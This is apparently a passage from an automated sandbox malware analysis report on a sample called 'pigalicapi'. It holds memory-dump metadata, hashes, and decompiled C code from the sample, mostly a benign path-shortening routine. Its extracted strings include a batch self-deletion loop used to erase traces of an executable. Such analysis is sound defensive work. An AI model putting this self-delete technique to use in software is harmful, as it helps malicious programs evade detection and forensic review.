                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: File$lstrcat$Close$CreateHandleNameProcess$AttributesCountDeleteDirectoryEnvironmentExitModuleOpenProfileSleepTempTerminateThreadTickUsersValueVariableWritelstrlenwnsprintf
                                                                                                                                                                                                                                                                                          • String ID: .bat$.exe$:repeatdel %sif exist %s goto :repeatdel %%0$D$TEMP$USERPROFILE$pigalicapi$slf
                                                                                                                                                                                                                                                                                          • API String ID: 3221898725-336785456
                                                                                                                                                                                                                                                                                          • Opcode ID: fa5edaca191c21db1bfd21e4a2ba9e4dafc3ba9ee2ebd150ac9fab347fea4d6a
                                                                                                                                                                                                                                                                                          • Instruction ID: 33d1a80e31bd16fda39fb1d5e61c33b6d2d8e7faa3bd40571536c86a9d597677
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fa5edaca191c21db1bfd21e4a2ba9e4dafc3ba9ee2ebd150ac9fab347fea4d6a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 277134B1A44318ABF7649F60DC49FEA7778EB44705F448698B209B60C1DBBCAA84CF51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E00806040(CHAR* __eax, CHAR* _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                          				void* _v5;
                                                                                                                                                                                                                                                                                          				signed int _v6;
                                                                                                                                                                                                                                                                                          				char _v11;
                                                                                                                                                                                                                                                                                          				char _v12;
                                                                                                                                                                                                                                                                                          				CHAR* _v16;
                                                                                                                                                                                                                                                                                          				int _v20;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				int _t73;
                                                                                                                                                                                                                                                                                          				CHAR* _t74;
                                                                                                                                                                                                                                                                                          				CHAR* _t75;
                                                                                                                                                                                                                                                                                          				int _t76;
                                                                                                                                                                                                                                                                                          				signed int _t77;
                                                                                                                                                                                                                                                                                          				signed int _t78;
                                                                                                                                                                                                                                                                                          				int _t79;
                                                                                                                                                                                                                                                                                          				signed int _t84;
                                                                                                                                                                                                                                                                                          				void* _t88;
                                                                                                                                                                                                                                                                                          				void* _t102;
                                                                                                                                                                                                                                                                                          				signed int _t104;
                                                                                                                                                                                                                                                                                          				signed int _t105;
                                                                                                                                                                                                                                                                                          				CHAR* _t119;
                                                                                                                                                                                                                                                                                          				CHAR* _t120;
                                                                                                                                                                                                                                                                                          				CHAR* _t121;
                                                                                                                                                                                                                                                                                          				char _t124;
                                                                                                                                                                                                                                                                                          				char _t125;
                                                                                                                                                                                                                                                                                          				intOrPtr _t126;
                                                                                                                                                                                                                                                                                          				char _t132;
                                                                                                                                                                                                                                                                                          				char _t135;
                                                                                                                                                                                                                                                                                          				void* _t143;
                                                                                                                                                                                                                                                                                          				char* _t146;
                                                                                                                                                                                                                                                                                          				intOrPtr _t147;
                                                                                                                                                                                                                                                                                          				void* _t148;
                                                                                                                                                                                                                                                                                          				intOrPtr _t149;
                                                                                                                                                                                                                                                                                          				void* _t150;
                                                                                                                                                                                                                                                                                          				signed int _t152;
                                                                                                                                                                                                                                                                                          				signed int _t153;
                                                                                                                                                                                                                                                                                          				void* _t154;
                                                                                                                                                                                                                                                                                          				signed int _t159;
                                                                                                                                                                                                                                                                                          				intOrPtr _t161;
                                                                                                                                                                                                                                                                                          				void* _t164;
                                                                                                                                                                                                                                                                                          				void* _t165;
                                                                                                                                                                                                                                                                                          				void* _t166;
                                                                                                                                                                                                                                                                                          				signed int _t167;
                                                                                                                                                                                                                                                                                          				void* _t168;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t119 = __eax;
                                                                                                                                                                                                                                                                                          				_t73 = lstrlenA(__eax);
                                                                                                                                                                                                                                                                                          				_t147 = _a8;
                                                                                                                                                                                                                                                                                          				if(_t73 >= _t147) {
                                                                                                                                                                                                                                                                                          					 *_a4 = 0;
                                                                                                                                                                                                                                                                                          					_t124 =  *_t119;
                                                                                                                                                                                                                                                                                          					_v5 = 0x5c;
                                                                                                                                                                                                                                                                                          					_t74 = _t119;
                                                                                                                                                                                                                                                                                          					while(_t124 != 0) {
                                                                                                                                                                                                                                                                                          						if(_t124 == 0x2f || _t124 == 0x5c) {
                                                                                                                                                                                                                                                                                          							_v5 = _t124;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t74 = CharNextA(_t74);
                                                                                                                                                                                                                                                                                          						_t124 =  *_t74;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t125 =  *_t119;
                                                                                                                                                                                                                                                                                          					_v16 = _t119;
                                                                                                                                                                                                                                                                                          					_t75 = _t119;
                                                                                                                                                                                                                                                                                          					while(_t125 != 0) {
                                                                                                                                                                                                                                                                                          						if(_t125 == 0x5c || _t125 == 0x3a || _t125 == 0x2f) {
                                                                                                                                                                                                                                                                                          							_t135 = _t75[1];
                                                                                                                                                                                                                                                                                          							_t146 =  &(_t75[1]);
                                                                                                                                                                                                                                                                                          							if(_t135 != 0 && _t135 != 0x5c && _t135 != 0x2f) {
                                                                                                                                                                                                                                                                                          								_v16 = _t146;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t75 = CharNextA(_t75);
                                                                                                                                                                                                                                                                                          						_t125 =  *_t75;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t76 = lstrlenA(_v16);
                                                                                                                                                                                                                                                                                          					_v20 = _t76;
                                                                                                                                                                                                                                                                                          					if(_v16 != _t119 || _t147 <= 3) {
                                                                                                                                                                                                                                                                                          						if(_t147 >= 7) {
                                                                                                                                                                                                                                                                                          							_t159 = _t147 - _t76 - 5;
                                                                                                                                                                                                                                                                                          							if(_t159 >= 0) {
                                                                                                                                                                                                                                                                                          								if(_t159 > 0) {
                                                                                                                                                                                                                                                                                          									_t153 = _t159;
                                                                                                                                                                                                                                                                                          									while(IsDBCSLeadByte(_t119[_t153 - 1] & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          										_t153 = _t153 - 1;
                                                                                                                                                                                                                                                                                          										if(_t153 > 0) {
                                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										break;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									if((_t159 - _t153 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                          										_t159 = _t159 - 1;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t159 = 0;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t126 = _a8;
                                                                                                                                                                                                                                                                                          							_t148 = 0;
                                                                                                                                                                                                                                                                                          							_t77 = _t159;
                                                                                                                                                                                                                                                                                          							if(_t126 == 0) {
                                                                                                                                                                                                                                                                                          								goto L61;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								if(_t159 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          									if(_t126 > _t159) {
                                                                                                                                                                                                                                                                                          										goto L60;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										 *_a4 = 0;
                                                                                                                                                                                                                                                                                          										goto L61;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t152 = _t126 - 1;
                                                                                                                                                                                                                                                                                          									if(_t152 >= lstrlenA(_t119)) {
                                                                                                                                                                                                                                                                                          										_t77 = lstrlenA(_t119);
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t77 = _t152;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t148 = 0x50;
                                                                                                                                                                                                                                                                                          									L60:
                                                                                                                                                                                                                                                                                          									_t77 = lstrcpynA(_a4, _t119, _t77 + 1);
                                                                                                                                                                                                                                                                                          									if(_t77 == 0) {
                                                                                                                                                                                                                                                                                          										L61:
                                                                                                                                                                                                                                                                                          										_t148 = 0x16;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_t78 = _t77 & 0xffffff00 | _t148 == 0x00000000;
                                                                                                                                                                                                                                                                                          							_v6 = _t78;
                                                                                                                                                                                                                                                                                          							if(_t78 != 0) {
                                                                                                                                                                                                                                                                                          								_t79 = lstrlenA("...");
                                                                                                                                                                                                                                                                                          								_t149 = _a8;
                                                                                                                                                                                                                                                                                          								if(_t149 > _t79) {
                                                                                                                                                                                                                                                                                          									lstrcatA(_a4, "...");
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v12 = _v5;
                                                                                                                                                                                                                                                                                          								_v11 = 0;
                                                                                                                                                                                                                                                                                          								if(_t149 > lstrlenA( &_v12)) {
                                                                                                                                                                                                                                                                                          									lstrcatA(_a4,  &_v12);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								if(_t149 <= _v20 + 4) {
                                                                                                                                                                                                                                                                                          									_t150 = _t149 + 0xfffffff8;
                                                                                                                                                                                                                                                                                          									if(_t150 > 0) {
                                                                                                                                                                                                                                                                                          										_t88 = E00806000(_t150, _v16);
                                                                                                                                                                                                                                                                                          										_t168 = _t168 + 4;
                                                                                                                                                                                                                                                                                          										if(_t88 != 0) {
                                                                                                                                                                                                                                                                                          											_t150 = _t150 - 1;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t120 = _a4;
                                                                                                                                                                                                                                                                                          									_t161 = _a8;
                                                                                                                                                                                                                                                                                          									_t84 = E00804910(_t150, _t161 - 4, _v16,  &(_t120[4])) & 0xffffff00 | _t83 == 0x00000000;
                                                                                                                                                                                                                                                                                          									_v6 = _t84;
                                                                                                                                                                                                                                                                                          									if(_t84 != 0 && _t161 > lstrlenA("...")) {
                                                                                                                                                                                                                                                                                          										lstrcatA(_t120, "...");
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L80;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t121 = _v16;
                                                                                                                                                                                                                                                                                          									if(_t149 <= lstrlenA(_t121)) {
                                                                                                                                                                                                                                                                                          										goto L80;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										lstrcatA(_a4, _t121);
                                                                                                                                                                                                                                                                                          										return _v6;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								return _t78;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t164 = _t147 - 1;
                                                                                                                                                                                                                                                                                          							_t102 = 0;
                                                                                                                                                                                                                                                                                          							if(_t164 > 0) {
                                                                                                                                                                                                                                                                                          								do {
                                                                                                                                                                                                                                                                                          									_t132 = _v5;
                                                                                                                                                                                                                                                                                          									_t33 = _t102 + 1; // 0x1
                                                                                                                                                                                                                                                                                          									_t143 = _t33;
                                                                                                                                                                                                                                                                                          									if(_t143 != 4) {
                                                                                                                                                                                                                                                                                          										_t132 = 0x2e;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									 *((char*)(_t102 + _a4)) = _t132;
                                                                                                                                                                                                                                                                                          									_t102 = _t143;
                                                                                                                                                                                                                                                                                          								} while (_t102 < _t164);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_a4[_t147 - 1] = 0;
                                                                                                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t165 = 0;
                                                                                                                                                                                                                                                                                          						_t104 = _t147 - 4;
                                                                                                                                                                                                                                                                                          						if(_t147 == 0) {
                                                                                                                                                                                                                                                                                          							L28:
                                                                                                                                                                                                                                                                                          							_t165 = 0x16;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							if(_t104 != 0xffffffff) {
                                                                                                                                                                                                                                                                                          								if(_t147 > _t104) {
                                                                                                                                                                                                                                                                                          									goto L27;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t104 = _a4;
                                                                                                                                                                                                                                                                                          									 *_t104 = 0;
                                                                                                                                                                                                                                                                                          									goto L28;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t167 = _t147 - 1;
                                                                                                                                                                                                                                                                                          								if(_t167 >= lstrlenA(_t119)) {
                                                                                                                                                                                                                                                                                          									_t104 = lstrlenA(_t119);
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_t104 = _t167;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_t165 = 0x50;
                                                                                                                                                                                                                                                                                          								L27:
                                                                                                                                                                                                                                                                                          								_t104 = lstrcpynA(_a4, _t119, _t104 + 1);
                                                                                                                                                                                                                                                                                          								if(_t104 == 0) {
                                                                                                                                                                                                                                                                                          									goto L28;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t105 = _t104 & 0xffffff00 | _t165 == 0x00000000;
                                                                                                                                                                                                                                                                                          						_v6 = _t105;
                                                                                                                                                                                                                                                                                          						if(_t105 == 0) {
                                                                                                                                                                                                                                                                                          							L80:
                                                                                                                                                                                                                                                                                          							return _v6;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t154 = _t147 + 0xfffffffd;
                                                                                                                                                                                                                                                                                          							_t166 = _t154;
                                                                                                                                                                                                                                                                                          							if(_t154 > 0) {
                                                                                                                                                                                                                                                                                          								while(IsDBCSLeadByte(_t119[_t166 - 1] & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                          									_t166 = _t166 - 1;
                                                                                                                                                                                                                                                                                          									if(_t166 > 0) {
                                                                                                                                                                                                                                                                                          										continue;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									break;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								if((_t154 - _t166 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                          									_a4[_a8 - 4] = 0;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							if(_a8 <= lstrlenA("...")) {
                                                                                                                                                                                                                                                                                          								goto L80;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								lstrcatA(_a4, "...");
                                                                                                                                                                                                                                                                                          								return _v6;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					if(_t147 > lstrlenA(_t119)) {
                                                                                                                                                                                                                                                                                          						lstrcpyA(_a4, _t119);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return 1;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}














































                                                                                                                                                                                                                                                                                          0x0080604f
                                                                                                                                                                                                                                                                                          0x00806052
                                                                                                                                                                                                                                                                                          0x00806054
                                                                                                                                                                                                                                                                                          0x00806059
                                                                                                                                                                                                                                                                                          0x0080607f
                                                                                                                                                                                                                                                                                          0x00806082
                                                                                                                                                                                                                                                                                          0x00806084
                                                                                                                                                                                                                                                                                          0x00806088
                                                                                                                                                                                                                                                                                          0x0080608c
                                                                                                                                                                                                                                                                                          0x00806093
                                                                                                                                                                                                                                                                                          0x0080609a
                                                                                                                                                                                                                                                                                          0x0080609a
                                                                                                                                                                                                                                                                                          0x0080609e
                                                                                                                                                                                                                                                                                          0x008060a0
                                                                                                                                                                                                                                                                                          0x008060a2
                                                                                                                                                                                                                                                                                          0x008060a6
                                                                                                                                                                                                                                                                                          0x008060a8
                                                                                                                                                                                                                                                                                          0x008060ab
                                                                                                                                                                                                                                                                                          0x008060af
                                                                                                                                                                                                                                                                                          0x008060b4
                                                                                                                                                                                                                                                                                          0x008060c0
                                                                                                                                                                                                                                                                                          0x008060c3
                                                                                                                                                                                                                                                                                          0x008060c8
                                                                                                                                                                                                                                                                                          0x008060d4
                                                                                                                                                                                                                                                                                          0x008060d4
                                                                                                                                                                                                                                                                                          0x008060c8
                                                                                                                                                                                                                                                                                          0x008060d8
                                                                                                                                                                                                                                                                                          0x008060da
                                                                                                                                                                                                                                                                                          0x008060dc
                                                                                                                                                                                                                                                                                          0x008060e4
                                                                                                                                                                                                                                                                                          0x008060ea
                                                                                                                                                                                                                                                                                          0x008060f0
                                                                                                                                                                                                                                                                                          0x008061cb
                                                                                                                                                                                                                                                                                          0x00806204
                                                                                                                                                                                                                                                                                          0x00806207
                                                                                                                                                                                                                                                                                          0x0080620f
                                                                                                                                                                                                                                                                                          0x00806211
                                                                                                                                                                                                                                                                                          0x00806213
                                                                                                                                                                                                                                                                                          0x00806223
                                                                                                                                                                                                                                                                                          0x00806226
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00806226
                                                                                                                                                                                                                                                                                          0x0080622e
                                                                                                                                                                                                                                                                                          0x00806230
                                                                                                                                                                                                                                                                                          0x00806230
                                                                                                                                                                                                                                                                                          0x0080622e
                                                                                                                                                                                                                                                                                          0x00806209
                                                                                                                                                                                                                                                                                          0x00806209
                                                                                                                                                                                                                                                                                          0x00806209
                                                                                                                                                                                                                                                                                          0x00806231
                                                                                                                                                                                                                                                                                          0x00806234
                                                                                                                                                                                                                                                                                          0x00806236
                                                                                                                                                                                                                                                                                          0x0080623a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080623c
                                                                                                                                                                                                                                                                                          0x0080623f
                                                                                                                                                                                                                                                                                          0x0080628e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00806290
                                                                                                                                                                                                                                                                                          0x00806293
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00806293
                                                                                                                                                                                                                                                                                          0x00806241
                                                                                                                                                                                                                                                                                          0x00806248
                                                                                                                                                                                                                                                                                          0x0080624f
                                                                                                                                                                                                                                                                                          0x00806256
                                                                                                                                                                                                                                                                                          0x00806251
                                                                                                                                                                                                                                                                                          0x00806251
                                                                                                                                                                                                                                                                                          0x00806251
                                                                                                                                                                                                                                                                                          0x00806258
                                                                                                                                                                                                                                                                                          0x0080625d
                                                                                                                                                                                                                                                                                          0x00806264
                                                                                                                                                                                                                                                                                          0x0080626c
                                                                                                                                                                                                                                                                                          0x0080626e
                                                                                                                                                                                                                                                                                          0x0080626e
                                                                                                                                                                                                                                                                                          0x0080626e
                                                                                                                                                                                                                                                                                          0x0080626c
                                                                                                                                                                                                                                                                                          0x0080623f
                                                                                                                                                                                                                                                                                          0x00806275
                                                                                                                                                                                                                                                                                          0x00806278
                                                                                                                                                                                                                                                                                          0x0080627d
                                                                                                                                                                                                                                                                                          0x008062a5
                                                                                                                                                                                                                                                                                          0x008062a7
                                                                                                                                                                                                                                                                                          0x008062ac
                                                                                                                                                                                                                                                                                          0x008062b7
                                                                                                                                                                                                                                                                                          0x008062b7
                                                                                                                                                                                                                                                                                          0x008062c4
                                                                                                                                                                                                                                                                                          0x008062c7
                                                                                                                                                                                                                                                                                          0x008062cf
                                                                                                                                                                                                                                                                                          0x008062d9
                                                                                                                                                                                                                                                                                          0x008062d9
                                                                                                                                                                                                                                                                                          0x008062e7
                                                                                                                                                                                                                                                                                          0x00806308
                                                                                                                                                                                                                                                                                          0x0080630d
                                                                                                                                                                                                                                                                                          0x00806313
                                                                                                                                                                                                                                                                                          0x00806318
                                                                                                                                                                                                                                                                                          0x0080631d
                                                                                                                                                                                                                                                                                          0x0080631f
                                                                                                                                                                                                                                                                                          0x0080631f
                                                                                                                                                                                                                                                                                          0x0080631d
                                                                                                                                                                                                                                                                                          0x00806320
                                                                                                                                                                                                                                                                                          0x00806323
                                                                                                                                                                                                                                                                                          0x0080633c
                                                                                                                                                                                                                                                                                          0x0080633f
                                                                                                                                                                                                                                                                                          0x00806344
                                                                                                                                                                                                                                                                                          0x0080635b
                                                                                                                                                                                                                                                                                          0x0080635b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008062e9
                                                                                                                                                                                                                                                                                          0x008062e9
                                                                                                                                                                                                                                                                                          0x008062f1
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008062f3
                                                                                                                                                                                                                                                                                          0x008062f8
                                                                                                                                                                                                                                                                                          0x00806307
                                                                                                                                                                                                                                                                                          0x00806307
                                                                                                                                                                                                                                                                                          0x008062f1
                                                                                                                                                                                                                                                                                          0x00806285
                                                                                                                                                                                                                                                                                          0x00806285
                                                                                                                                                                                                                                                                                          0x00806285
                                                                                                                                                                                                                                                                                          0x008061cd
                                                                                                                                                                                                                                                                                          0x008061cd
                                                                                                                                                                                                                                                                                          0x008061d0
                                                                                                                                                                                                                                                                                          0x008061d4
                                                                                                                                                                                                                                                                                          0x008061d6
                                                                                                                                                                                                                                                                                          0x008061d6
                                                                                                                                                                                                                                                                                          0x008061d9
                                                                                                                                                                                                                                                                                          0x008061d9
                                                                                                                                                                                                                                                                                          0x008061df
                                                                                                                                                                                                                                                                                          0x008061e1
                                                                                                                                                                                                                                                                                          0x008061e1
                                                                                                                                                                                                                                                                                          0x008061e6
                                                                                                                                                                                                                                                                                          0x008061e9
                                                                                                                                                                                                                                                                                          0x008061eb
                                                                                                                                                                                                                                                                                          0x008061d6
                                                                                                                                                                                                                                                                                          0x008061f2
                                                                                                                                                                                                                                                                                          0x008061ff
                                                                                                                                                                                                                                                                                          0x008061ff
                                                                                                                                                                                                                                                                                          0x008060ff
                                                                                                                                                                                                                                                                                          0x008060ff
                                                                                                                                                                                                                                                                                          0x00806101
                                                                                                                                                                                                                                                                                          0x00806106
                                                                                                                                                                                                                                                                                          0x00806140
                                                                                                                                                                                                                                                                                          0x00806140
                                                                                                                                                                                                                                                                                          0x00806108
                                                                                                                                                                                                                                                                                          0x0080610b
                                                                                                                                                                                                                                                                                          0x008061b7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008061bd
                                                                                                                                                                                                                                                                                          0x008061bd
                                                                                                                                                                                                                                                                                          0x008061c0
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x008061c0
                                                                                                                                                                                                                                                                                          0x00806111
                                                                                                                                                                                                                                                                                          0x00806112
                                                                                                                                                                                                                                                                                          0x0080611d
                                                                                                                                                                                                                                                                                          0x00806124
                                                                                                                                                                                                                                                                                          0x0080611f
                                                                                                                                                                                                                                                                                          0x0080611f
                                                                                                                                                                                                                                                                                          0x0080611f
                                                                                                                                                                                                                                                                                          0x0080612a
                                                                                                                                                                                                                                                                                          0x0080612f
                                                                                                                                                                                                                                                                                          0x00806136
                                                                                                                                                                                                                                                                                          0x0080613e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080613e
                                                                                                                                                                                                                                                                                          0x0080610b
                                                                                                                                                                                                                                                                                          0x00806147
                                                                                                                                                                                                                                                                                          0x0080614a
                                                                                                                                                                                                                                                                                          0x0080614f
                                                                                                                                                                                                                                                                                          0x00806361
                                                                                                                                                                                                                                                                                          0x0080636a
                                                                                                                                                                                                                                                                                          0x00806155
                                                                                                                                                                                                                                                                                          0x00806155
                                                                                                                                                                                                                                                                                          0x00806158
                                                                                                                                                                                                                                                                                          0x0080615c
                                                                                                                                                                                                                                                                                          0x00806160
                                                                                                                                                                                                                                                                                          0x00806170
                                                                                                                                                                                                                                                                                          0x00806173
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00806173
                                                                                                                                                                                                                                                                                          0x0080617b
                                                                                                                                                                                                                                                                                          0x00806183
                                                                                                                                                                                                                                                                                          0x00806183
                                                                                                                                                                                                                                                                                          0x0080617b
                                                                                                                                                                                                                                                                                          0x00806196
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0080619c
                                                                                                                                                                                                                                                                                          0x008061a5
                                                                                                                                                                                                                                                                                          0x008061b4
                                                                                                                                                                                                                                                                                          0x008061b4
                                                                                                                                                                                                                                                                                          0x00806196
                                                                                                                                                                                                                                                                                          0x0080614f
                                                                                                                                                                                                                                                                                          0x0080605b
                                                                                                                                                                                                                                                                                          0x00806060
                                                                                                                                                                                                                                                                                          0x00806067
                                                                                                                                                                                                                                                                                          0x00806067
                                                                                                                                                                                                                                                                                          0x00806075
                                                                                                                                                                                                                                                                                          0x00806075

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.711552533.0000000000801000.00000020.00000001.01000000.00000006.sdmp, Offset: 00800000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.711459674.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000820000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712110114.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.712946985.0000000000869000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713011724.000000000086C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713140868.0000000000880000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.713182892.0000000000883000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_800000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen$CharNext$ByteLeadlstrcatlstrcpylstrcpyn
                                                                                                                                                                                                                                                                                          • String ID: ...$\
                                                                                                                                                                                                                                                                                          • API String ID: 2258621147-1507338726
                                                                                                                                                                                                                                                                                          • Opcode ID: 750efe567bd01509873f6284c2ac77ed58b8a78e5be3e5f3a96eaa591ab791ef
                                                                                                                                                                                                                                                                                          • Instruction ID: b561b5a20a38c0c980647d6651ec01b4e3b5a24d7a19a10d791a578de9d405d8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 750efe567bd01509873f6284c2ac77ed58b8a78e5be3e5f3a96eaa591ab791ef
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9BA14836A00619ABCB618B78DC84BAE7FA5FF85354F148151EC54EB3C2E6319D368B90
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                                                                                                          			E00810060(struct HMENU__** __ecx) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				char _v211;
                                                                                                                                                                                                                                                                                          				char _v212;
                                                                                                                                                                                                                                                                                          				int _v216;
                                                                                                                                                                                                                                                                                          				int _v220;
                                                                                                                                                                                                                                                                                          				signed int _v224;
                                                                                                                                                                                                                                                                                          				int _v228;
                                                                                                                                                                                                                                                                                          				void* _v232;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v236;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v240;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v244;
                                                                                                                                                                                                                                                                                          				void* _v248;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v264;
